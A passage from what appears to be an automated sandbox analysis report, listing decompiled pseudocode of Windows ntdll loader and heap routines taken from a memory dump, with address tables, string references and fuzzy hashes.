				if(E02B01B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E02B01B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E02B01B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E02B01B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L02B14620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E02B3F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E02B41370(_t276, 0x2ad4e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E02B3BB40(0,  &_v68, _t170);
									if(L02B043C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E02B3BB40(_t257,  &_v68, _t243);
								if(L02B043C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E02B41370(_t278, 0x2ad4e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L02B14620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E02B3F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E02B41370(_v16, 0x2ad4e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E02B3BB40(_t262,  &_v68, _t244);
								if(L02B043C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E02B41370(_t282, 0x2ad4e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E02B3BB40(_t262,  &_v68, _t201);
							if(L02B043C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L02B14620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E02B3F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E02B41370(_t280, 0x2ad4e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E02B3BB40(_t267,  &_v68, _t245);
							if(L02B043C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E02B41370(_t284, 0x2ad4e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E02B3BB40(_t267,  &_v68, _t224);
						if(L02B043C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                        0x02b03d3c
                        0x02b03d42
                        0x02b03d44
                        0x02b03d46
                        0x02b03d49
                        0x02b03d4c
                        0x02b03d4f
                        0x02b03d52
                        0x02b03d55
                        0x02b03d58
                        0x02b03d5b
                        0x02b03d5f
                        0x02b03d61
                        0x02b03d66
                        0x02b58213
                        0x02b58218
                        0x02b04085
                        0x02b04088
                        0x02b0408e
                        0x02b04094
                        0x02b0409a
                        0x02b040a0
                        0x02b040a6
                        0x02b040a9
                        0x02b040af
                        0x02b040b6
                        0x02b040bd
                        0x02b040bd
                        0x02b03d83
                        0x02b5821f
                        0x02b58229
                        0x02b58238
                        0x02b58238
                        0x02b5823d
                        0x02b5823d
                        0x02b03da0
                        0x02b03daf
                        0x02b03db5
                        0x02b03dba
                        0x02b03dba
                        0x02b03dd4
                        0x02b03e94
                        0x02b03eab
                        0x02b03f6d
                        0x02b03f84
                        0x02b0406b
                        0x02b0406b
                        0x02b0406e
                        0x02b0406e
                        0x02b04070
                        0x02b04074
                        0x02b58351
                        0x02b58351
                        0x02b0407a
                        0x02b0407f
                        0x02b5835d
                        0x02b58370
                        0x02b58377
                        0x02b58379
                        0x02b5837c
                        0x02b5837c
                        0x02b5835d
                        0x00000000
                        0x02b0407f
                        0x02b03f8a
                        0x02b03f8d
                        0x02b03f90
                        0x02b03f95
                        0x02b5830d
                        0x02b5830f
                        0x02b03f9b
                        0x02b03fac
                        0x02b03fae
                        0x02b03fb1
                        0x02b03fb1
                        0x02b03fb6
                        0x02b58317
                        0x02b5831a
                        0x00000000
                        0x02b03fbc
                        0x02b03fc1
                        0x02b03fc9
                        0x02b03fd7
                        0x02b03fda
                        0x02b03fdd
                        0x02b04021
                        0x02b04021
                        0x02b04029
                        0x02b04030
                        0x02b04044
                        0x02b04046
                        0x02b04046
                        0x02b04044
                        0x02b04049
                        0x02b58327
                        0x02b58334
                        0x02b58339
                        0x02b5833c
                        0x02b0404f
                        0x02b0404f
                        0x02b0404f
                        0x02b04051
                        0x02b04056
                        0x02b04063
                        0x02b04063
                        0x02b04068
                        0x00000000
                        0x02b04068
                        0x02b03fdf
                        0x02b03fe2
                        0x02b03fe4
                        0x02b03fe7
                        0x02b03fef
                        0x02b04003
                        0x02b04005
                        0x02b04005
                        0x02b0400c
                        0x02b04013
                        0x02b04016
                        0x02b04017
                        0x02b0401b
                        0x02b0401e
                        0x00000000
                        0x02b0401e
                        0x02b03fb6
                        0x02b03eb1
                        0x02b03eb4
                        0x02b03eb7
                        0x02b03ebc
                        0x02b582a9
                        0x02b582ab
                        0x02b03ec2
                        0x02b03ed3
                        0x02b03ed5
                        0x02b03ed8
                        0x02b03ed8
                        0x02b03edd
                        0x02b582b3
                        0x02b582b6
                        0x00000000
                        0x02b03ee3
                        0x02b03ee8
                        0x02b03eed
                        0x02b03ef0
                        0x02b03ef3
                        0x02b03f02
                        0x02b03f05
                        0x02b03f08
                        0x02b582c0
                        0x02b582c3
                        0x02b582c5
                        0x02b582c8
                        0x02b582d0
                        0x02b582e4
                        0x02b582e6
                        0x02b582e6
                        0x02b582ed
                        0x02b582f4
                        0x02b582f7
                        0x02b582f8
                        0x02b582fc
                        0x02b582ff
                        0x02b582ff
                        0x02b03f0e
                        0x02b03f11
                        0x02b03f16
                        0x02b03f1d
                        0x02b03f31
                        0x02b58307
                        0x02b58307
                        0x02b03f31
                        0x02b03f39
                        0x02b03f48
                        0x02b03f4d
                        0x02b03f50
                        0x02b03f50
                        0x02b03f53
                        0x02b03f58
                        0x02b03f65
                        0x02b03f65
                        0x02b03f6a
                        0x00000000
                        0x02b03f6a
                        0x02b03edd
                        0x02b03dda
                        0x02b03ddd
                        0x02b03de0
                        0x02b03de5
                        0x02b58245
                        0x02b03deb
                        0x02b03df7
                        0x02b03dfc
                        0x02b03dfe
                        0x02b03e01
                        0x02b03e01
                        0x02b03e06
                        0x02b5824d
                        0x02b5824f
                        0x02b58254
                        0x00000000
                        0x02b03e0c
                        0x02b03e11
                        0x02b03e16
                        0x02b03e19
                        0x02b03e29
                        0x02b03e2c
                        0x02b03e2f
                        0x02b5825c
                        0x02b5825f
                        0x02b58261
                        0x02b58264
                        0x02b5826c
                        0x02b58280
                        0x02b58282
                        0x02b58282
                        0x02b58289
                        0x02b58290
                        0x02b58293
                        0x02b58294
                        0x02b58298
                        0x02b5829b
                        0x02b5829b
                        0x02b03e35
                        0x02b03e38
                        0x02b03e3d
                        0x02b03e44
                        0x02b03e58
                        0x02b582a3
                        0x02b582a3
                        0x02b03e58
                        0x02b03e60
                        0x02b03e6f
                        0x02b03e74
                        0x02b03e77
                        0x02b03e77
                        0x02b03e7a
                        0x02b03e7f
                        0x02b03e8c
                        0x02b03e8c
                        0x02b03e91
                        0x00000000
                        0x02b03e91

                        Strings
                        • Kernel-MUI-Language-SKU, xrefs: 02B03F70
                        • Kernel-MUI-Number-Allowed, xrefs: 02B03D8C
                        • Kernel-MUI-Language-Disallowed, xrefs: 02B03E97
                        • WindowsExcludedProcs, xrefs: 02B03D6F
                        • Kernel-MUI-Language-Allowed, xrefs: 02B03DC0
                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                        • API String ID: 0-258546922
                        • Opcode ID: 935d400e19e9de9aba1e6236eeee428e126293ab723038a8ae8fb1aefa700654
                        • Instruction ID: d88c662dc7848a980d70ded148558e7221f3078b9ef7ffb14df8b299c1f30756
                        • Opcode Fuzzy Hash: 935d400e19e9de9aba1e6236eeee428e126293ab723038a8ae8fb1aefa700654
                        • Instruction Fuzzy Hash: 1FF12071D00618EFCB16DF98C980AEEBBB9FF48750F14419AE905A7250EB359E41CFA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B28E00, Relevance: 6.4, Strings: 5, Instructions: 126COMMON
                        Download Yara Rule
                        C-Code - Quality: 44%
                        			E02B28E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x2bed360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x2be8464; // 0x74790110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x2be5780 & 0x00000003) != 0) {
							E02B75510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x2be5780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E02B3B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x2be7984; // 0x603e68
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x2be8464; // 0x74790110
					 *0x2beb1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E02B29B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x2be5780 & 0x00000005) != 0) {
						_push(_t49);
						E02B75510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}




















                        0x02b28e0f
                        0x02b28e16
                        0x02b28e19
                        0x02b28e1b
                        0x02b28e21
                        0x02b28e7f
                        0x02b28e85
                        0x02b69354
                        0x02b6936c
                        0x02b69371
                        0x02b6937b
                        0x02b69381
                        0x02b69381
                        0x02b6937b
                        0x02b28e9d
                        0x02b28e9d
                        0x02b28e29
                        0x02b28e2c
                        0x02b28e38
                        0x02b28e3e
                        0x02b28e43
                        0x02b28eb5
                        0x02b28eb9
                        0x02b692aa
                        0x02b692af
                        0x02b692e8
                        0x02b692e8
                        0x02b692af
                        0x02b28eb9
                        0x02b28e45
                        0x02b28e53
                        0x02b28e5b
                        0x02b28e5f
                        0x02b28e78
                        0x02b28e78
                        0x02b28e7d
                        0x02b28ec3
                        0x02b28ecd
                        0x02b28ed2
                        0x02b28ed2
                        0x02b28ec5
                        0x02b28ec5
                        0x00000000
                        0x02b28e7d
                        0x02b28e67
                        0x02b28ea4
                        0x02b6931a
                        0x00000000
                        0x00000000
                        0x02b69320
                        0x02b28ea4
                        0x02b28e70
                        0x02b69325
                        0x02b69340
                        0x02b69345
                        0x02b69345
                        0x02b28e76
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000

                        Strings
                        • LdrpFindDllActivationContext, xrefs: 02B69331, 02B6935D
                        • h>`, xrefs: 02B28E2C
                        • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 02B6932A
                        • Querying the active activation context failed with status 0x%08lx, xrefs: 02B69357
                        • minkernel\ntdll\ldrsnap.c, xrefs: 02B6933B, 02B69367
                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$h>`$minkernel\ntdll\ldrsnap.c
                        • API String ID: 0-3477089597
                        • Opcode ID: 15a7ee422cd7d5353a06ba6fda8394d6c54a926ad5927191f2c97f92a0c7fb81
                        • Instruction ID: d3a752ef38a1e7e0a31536776a95c8ff2b299e6a9106b0e7d75d91bfb0a76c55
                        • Opcode Fuzzy Hash: 15a7ee422cd7d5353a06ba6fda8394d6c54a926ad5927191f2c97f92a0c7fb81
                        • Instruction Fuzzy Hash: CD412732A40335EFEF35BA18C849B75B3B5FB04648F0945E9E80D5B151EB749C88C7A1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02AF40E1, Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                        Download Yara Rule
                        C-Code - Quality: 29%
                        			E02AF40E1(void* __edx) {
				void* _t19;
				void* _t29;

				_t28 = _t19;
				_t29 = __edx;
				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E02AFB150();
					} else {
						E02AFB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E02AFB150("Invalid heap signature for heap at %p", _t28);
					if(_t29 != 0) {
						E02AFB150(", passed to %s", _t29);
					}
					_push("\n");
					E02AFB150();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x2be6378 = 1;
						asm("int3");
						 *0x2be6378 = 0;
					}
					return 0;
				}
				return 1;
			}





                        0x02af40e6
                        0x02af40e8
                        0x02af40f1
                        0x02b5042d
                        0x02b5044c
                        0x02b50451
                        0x02b5042f
                        0x02b50444
                        0x02b50449
                        0x02b5045d
                        0x02b50466
                        0x02b5046e
                        0x02b50474
                        0x02b50475
                        0x02b5047a
                        0x02b5048a
                        0x02b5048c
                        0x02b50493
                        0x02b50494
                        0x02b50494
                        0x00000000
                        0x02b5049b
                        0x00000000

                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
                        • API String ID: 0-188067316
                        • Opcode ID: 83a29893b7a568f921a667d819577879a0c390d0bcc4cbd39a80424138a11400
                        • Instruction ID: 3d52c6022c3da8379505f9a3a204a127ee55672e0e79a9dd449777d02ba41fc5
                        • Opcode Fuzzy Hash: 83a29893b7a568f921a667d819577879a0c390d0bcc4cbd39a80424138a11400
                        • Instruction Fuzzy Hash: 62014C32181250AEF329E7A8F50DF5277B8EB08F34F1D8869F5064F640CFA89484C524
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02BB49A4, Relevance: 5.1, Strings: 4, Instructions: 114COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID: InitializeThunk
                        • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                        • API String ID: 2994545307-336120773
                        • Opcode ID: 9445b014b3521089d2abca571e5ecf957f8fbde28339290ffabaaf00e704d828
                        • Instruction ID: 44f6b797a770666be1acdb837e7ee7cfac13db1d815ce37bb1fc52a71e0f0ecb
                        • Opcode Fuzzy Hash: 9445b014b3521089d2abca571e5ecf957f8fbde28339290ffabaaf00e704d828
                        • Instruction Fuzzy Hash: 72316A31240510FFE712DB98C994FB773B9FF09B24F144495F516CB252DBB0A840DA68
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B08794, Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                        Download Yara Rule
                        C-Code - Quality: 83%
                        			E02B08794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E02B0934A() != 0) {
								_t159 = E02B7A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x2be5780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E02B75510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x2be5780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E02B0849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E02B08999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E02B08999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x2be5c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x2be5c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E02B12280(_t92, 0x2be86cc);
															_t94 = E02BC9DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E02B261A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x2be5c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E02B08A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x2be5c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x2be5c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E02B3F380(_t136, 0x2ad1184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E02B12280(_t108, 0x2be86cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E02B261A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E02BC9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E02B0FFB0(_t118, _t156, 0x2be86cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E02B39A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}












































                        0x02b08799
                        0x02b0879d
                        0x02b087a1
                        0x02b087a3
                        0x02b087a8
                        0x02b087c3
                        0x02b087c3
                        0x02b087c8
                        0x02b087d1
                        0x02b087d4
                        0x02b087d8
                        0x02b087e5
                        0x02b087ec
                        0x02b59bfe
                        0x02b59c00
                        0x02b59c02
                        0x02b59c08
                        0x02b59c0d
                        0x02b59c0f
                        0x02b59c14
                        0x02b59c2d
                        0x02b59c32
                        0x02b59c37
                        0x02b59c3a
                        0x02b59c3c
                        0x02b59c42
                        0x02b59c42
                        0x02b59c3c
                        0x02b59c02
                        0x02b087da
                        0x02b087df
                        0x02b087e3
                        0x00000000
                        0x00000000
                        0x02b087e3
                        0x02b087f2
                        0x00000000
                        0x02b087fb
                        0x02b087fd
                        0x02b087fe
                        0x02b0880e
                        0x02b0880f
                        0x02b08810
                        0x02b08814
                        0x02b0881a
                        0x02b0881c
                        0x02b0881f
                        0x02b08821
                        0x02b08822
                        0x02b08824
                        0x02b08826
                        0x02b0882c
                        0x02b0882e
                        0x02b59c48
                        0x02b59c48
                        0x02b08834
